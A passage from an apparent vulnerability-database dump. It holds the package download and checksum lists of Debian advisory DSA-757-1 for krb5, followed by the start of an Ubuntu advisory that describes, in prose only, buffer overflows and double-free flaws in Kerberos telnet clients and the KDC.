http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 72452 3b67b8ba904b0c19984adfcfe2ebf355\n\n mipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 67064 e81d7ebb16801d27c10e33b5a6dfbf35\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 307300 c4cdccbcf0aec23eb91682eb208913e6\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 177378 679e5cdb56b74562b83062a6619a1143\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 211010 1344a0978e5a07333f99a139f07a21d0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 53838 d17b9d5734f2ced72ddb452284977dfd\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 55078 119221640223a1c79f30a94f5e11294e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 213508 a58e6f97a82736249a4ab034eac5f086\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 191122 391939f8e607fbcbfb69734b23dfe888\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 540976 492cefb3640a80883bfe633ab342dd38\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_mipsel.deb\n Size/MD5 checksum: 72272 42671910c574fffd6cc168930b0920a8\n\n powerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 62874 208a330e234131b7bccd02511a211ad4\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 303696 6784ebba9d38215f7239a86a1ffe3832\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 162892 88d55edcb6cc8efa62c6d317dd1b51ca\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 49516 7366d350910d3f787376c73c3f4b308d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 189698 dbc2a890d343039384a3b9c3b94cfd5c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 188618 920e7456ad6a63a236dda091a2a5877d\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 74226 3985482de74d7d01a0a5c0a7d86e5be2\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 49474 5a79df176b512a22f6f8798e8be67d7c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 164300 7c271ea098cabe4673a1940b991ea98a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_powerpc.deb\n Size/MD5 checksum: 491084 48fe52a33909c9e84d5df3df832ce460\n\n s390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 189478 8328c0dd0a4b48f93182d16c578d5a6a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 67246 ccce6c735b77612b93c9492dffe280aa\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 319800 33e21f4beeb4ec468cce9fea66b869cc\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 164476 ca9e122121d5e7064d75e10661f9b6b6\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 166610 cbdb3c20a92b077ebb25270e61ebc5b0\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 76788 f92d6d6c97278151576508504d6f6871\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 50408 063b686f9d0c7533e4f6eaf6b950cada\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 50434 510bd38a07280309f0d7c2ce0555647c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 190810 c904daff01d4c48a3bd8fd150d3e1b89\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_s390.deb\n Size/MD5 checksum: 453650 a2730b0bddaee953f5dfbc961c9f083d\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 463168 0dedc859bdd7ab6306f10ebd44e95e22\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 173190 b28677ee8c2a09e0dbc419e5befdf549\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 184512 fd7a26631abd3e97b0441d9209979736\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 49924 7f478a11996016b98618ce6a20c92a9f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 159702 7b2bee403efb894f5d2279d5656738ba\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 301640 f17bdbb01d9df8b08fdd6804c9d881dc\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 64542 693983c9bf0173af7b2369369d1362e9\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 73562 99697c7fe296e84c7503a3ac91e98b99\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 183600 6efce907c8eebb1d3a890ff094919bf9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_sparc.deb\n Size/MD5 checksum: 49914 556464474bd52abf7995534f0f16b80d\n\nDebian 3.1 (sarge)\n- ------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6-2sarge2.dsc\n Size/MD5 checksum: 782 da11a6168871f74929d30ec092b1da9c\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6-2sarge2.diff.gz\n Size/MD5 checksum: 660240 e775434ffebb62c866a0803fa75e88e0\n\n Architecture independent packages:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.3.6-2sarge2_all.deb\n Size/MD5 checksum: 718250 a6b3db90775a52c0bdf9388ec6261048\n\n alpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 246822 b523d89c2ba9efecbfd298c3ca40e512\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 71698 df52b765824a8a44acca587fcd0af77e\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 200588 ad625368cf5f1e92db1be48b2a141240\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 861060 6e4fc9586f471f4929e76c94b67b5964\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 89518 d4b6366a7c365bde92aa34663d6d9291\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 62298 f3b151f5990ae54b4a2bc6865dcdc303\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 422260 6c4ca4d0e2ee221882b6a293b06145e8\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 113680 5df8dcc58913faf2948e4c2653db2b29\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 145252 4cb670ffda210f75cace2767b94abc2f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_alpha.deb\n Size/MD5 checksum: 136778 70649da7b78490852e605db6ee73027d\n\n arm architecture\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 92758 d46e37c35d8951abff114dc2f426396f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 192236 0df006460bc184c5967f1f3ca11f4628\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 53010 24daf632b6460f71b2834267ebf70b0a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 114822 5667c4e72c1fc4c9e2890e507b0516d3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 74256 197167d6b853775ce2ebf5381abf545d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 57414 577089458e7931775aee87223d0f4008\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 126918 53ff993991999a3226af36d30f42caf6\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 633138 302b1b527b4402ab9e5be17242b49d68\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_arm.deb\n Size/MD5 checksum: 328506 c80a0a9cc5f15564bba30a4a5e677f7d\n\n hppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 63544 7274d39473d0c059ee9196f0fbb85829\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 383198 c1b1276f0bd7d2cfa9b2ca7621ac7f3a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 223408 ddb2262ac12dcc07261cad6fdbf86fe6\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 668944 7790b8aae056cdca2f795fe2d094f3a3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 138444 ba0b5d7ebd4c2da5ce8888393c5c51c1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 58690 1a83ec9c0f90b30f32a55bd85095e960\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 186550 f63594e91ba83030e34665b3dc33333d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 103810 b05f32be83ea6f21d1b440f3d9815e36\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 81280 b8a494c41f61746d16a5ef360abbd7c4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_hppa.deb\n Size/MD5 checksum: 124420 cafdeb049987536c09ef8be3d021eb50\n\n i386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 52186 00356fdf1a8534d13942ad3d58426da5\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 573872 06ee6f80509bda1f448e3151103daff8\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 190830 f84abd310272a79bb97671e347bc7a90\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 115466 ceff3bcdfc3160ebc6a3b02f01de4a87\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 57014 04481e4c248ea66d59ac88bfb01c69c8\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 94816 805ec4998e84a1956cbdb2953b3183ac\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 164898 e6c21f2bc6b36a99d012a7c85bb5888b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 127316 4503fc5f44a24097ba377bf74642e56b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 348752 f888b737b0d365be80b592e963c3ae14\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_i386.deb\n Size/MD5 checksum: 75396 bbf799a4af8e92e4f05a3c7b40eae35a\n\n ia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 164428 5e4a6d83e9a7a51f64346ef8b5cc9e14\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 133154 e207307fd20142dfa58bfdad5a66b703\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 166776 fa1e4a9cd6ec280f8ba4497fd0331c3f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 239580 dabb5d3c93e2e81be75568039540339a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 79248 5da389e996d41dbcb6d490f84479a90f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 288648 dcd3f4a635862a21d631a3c9d1b668ed\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 501692 27ed673e33624d61a2313a0c1ef46cf6\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 104572 8cc3ee2cd265036e2641611ea46abc1c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 72940 2527964df7d5e59b743cb119ce7ae90c\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_ia64.deb\n Size/MD5 checksum: 889240 f6f1660e3085898e7f3cd056e0203c0a\n\n m68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 121452 97e215d21e1d2cb24d03e1f4ebe20b3a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 305168 2629762692a34e2492ae5aca58252f33\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 70436 a18968476c9c251e764cc12c34865771\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 106794 d4ac1a6b4f8d60a95602d49ea6f3f704\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 87860 903bff079057ee299339ed4bc62f0d60\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 147084 ae79c4e145f112b93d5c392393e079b6\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 52748 452ea96796025a17cdc74da238e01f06\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 49052 3fc6eef30212fd7b31e30ad99030571b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 515278 555e8642d5d52a5c67b89d0419b977e2\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_m68k.deb\n Size/MD5 checksum: 173508 b88dcfe293aab38cc5e1d9acca4a8460\n\n mips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 81124 59ced8205d293659074ef03267367ace\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 354722 dd27f90f218101236bd35d7244cad3c3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 226132 1ebebe9d0cb8a9b0953976f8c07074fe\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 679376 31e9c416f2af5dcb8feb9ba857d9cb83\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 57452 131b7f5ad165c4cb2a2e78201b23a784\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 163476 87292e883fd4c536f63b5b59fcb5498c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 64784 7b7d127f073a8a2dc7adefb47e9c711c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 146236 ffa1c4bcdd3871619e191e5d27d6ebac\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 128648 adadfde444868efcc1307f2518cffdc4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_mips.deb\n Size/MD5 checksum: 102670 813c6168220a1c989d598672ba2700ea\n\n mipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 81356 d6c0866ee7f66a51e073e7485b509666\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 129350 2886ad47b91937c136991cd741f311f0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 57442 9fe252aefab22732c9657a098067fc6e\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 681984 ea291b54aa40d0a55568d36674b7c0eb\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 164910 5510eaf9b76c9c94940ebb9e5f5eb33c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 64524 3ff1c88cfe25cf6f40654ebd5be933a2\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 145980 edfc8eadf5531fb43c6ffafa1d844c43\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 225846 75ca71d000a3657c4019212c35d9111e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 102906 7276c4ecc22eea0139deceb3ac101727\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_mipsel.deb\n Size/MD5 checksum: 354452 8f8158c45a10711ce67890c71651d3b0\n\n powerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 82000 f58fe267de1b0fc630b35af231e47c01\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 56366 dad4efe57801436d3476079d7bd3438e\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 352428 195cae3d096c8fe39115a2d9b60a18ac\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 217060 03c65d717ebaac219b4908e842ef940f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 104444 dfc24bf1fa734b793b11d8d6a53151c5\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 634188 335a30c147ae013565c1403a3c717750\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 164962 b974bd1c9870660a3603dfbd0efd8731\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 125498 3da7d6b0f452ed3bd965a40af1aa05d0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 60960 862e8a596c6b993a3ad8f97b88b5c7c9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_powerpc.deb\n Size/MD5 checksum: 143090 cabfc4f5adb594329fc4a7a4e5adb776\n\n s390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 179612 274c272f1a233dfb2cc8a39f71cee1f7\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 624260 1ae8c3521483c0bcf55ca7f6952572d1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 213478 82187d843a9be9ddb8d6b7da673d28a0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 56508 61ed5cfc1d935f6602a053bf7aef81ba\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 132268 ffa0fa4707f7e61efd9e06e405fea8b1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 98560 5a044667aafd800c49636ef356331748\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 62642 c6018c73aef5a42c391e73a70c16067e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 120554 a52f54e4cb58803f9c7f5840dc2f8ee6\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 375518 4e927de27b9c199dad963ffe0983ecfd\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_s390.deb\n Size/MD5 checksum: 81688 fa25823b47cc780a7ef6cf2d482a2962\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 156992 4de30a5583e1087e91226fda3a8b7a2f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 72932 10462e84becec666be6b42933044672f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 126140 417a5afcf1d7d8f956353aaa8a581acc\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 52850 c8aa898a957bc5d14cc8fac9a76eda45\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 58204 145ae52c40c2e597f95b4efa08043ef4\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 329756 ed390ffde7edaa710e82fd04dac0d2fb\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 113300 73d58f6abd59c744040ff896c2ede81b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 92462 b077594d1145c454fcd51a9aa38363fb\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 576036 a196c0399c1a9c9b206647ec67f2a628\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge2_sparc.deb\n Size/MD5 checksum: 193852 3453f705b23dfec98b6481480b14352f\n\n- -------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 2, "modified": "2005-07-17T00:00:00", "published": "2005-07-17T00:00:00", "id": "DEBIAN:DSA-757-1:670FE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00144.html", "title": "[SECURITY] [DSA 757-1] New krb5 packages fix multiple vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-08-10T09:49:44", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-0469", "CVE-2005-0468", "CVE-2005-1175"], "description": "Ga\u00ebl Delalleau discovered a buffer overflow in the env_opt_add() \nfunction of the Kerberos 4 and 5 telnet clients. By sending specially \ncrafted replies, a malicious telnet server could exploit this to \nexecute arbitrary code with the privileges of the user running the \ntelnet client. (CVE-2005-0468)\n\nGa\u00ebl Delalleau discovered a buffer overflow in the handling of the \nLINEMODE suboptions in the telnet clients of Kerberos 4 and 5. By \nsending a specially constructed reply containing a large number of SLC \n(Set Local Character) commands, a remote attacker (i. e. a malicious \ntelnet server) could execute arbitrary commands with the privileges of \nthe user running the telnet client. (CVE-2005-0469)\n\nDaniel Wachdorf discovered two remote vulnerabilities in the Key \nDistribution Center of Kerberos 5 (krb5-kdc). By sending certain TCP \nconnection requests, a remote attacker could trigger a double-freeing \nof memory, which led to memory corruption and a crash of the KDC \nserver. (CVE-2005-1174). Under rare circumstances the same type of TCP \nconnection requests could also trigger a buffer overflow that could be \nexploited to run arbitrary code with the privileges of the KDC server. \n(CVE-2005-1175)\n\nMagnus Hagander discovered that the krb5_recvauth() function attempted \nto free previously freed memory in some situations. A remote attacker \ncould possibly exploit this to run arbitrary code with the privileges \nof the program that called this function. Most imporantly, this \naffects the following daemons: kpropd (from the 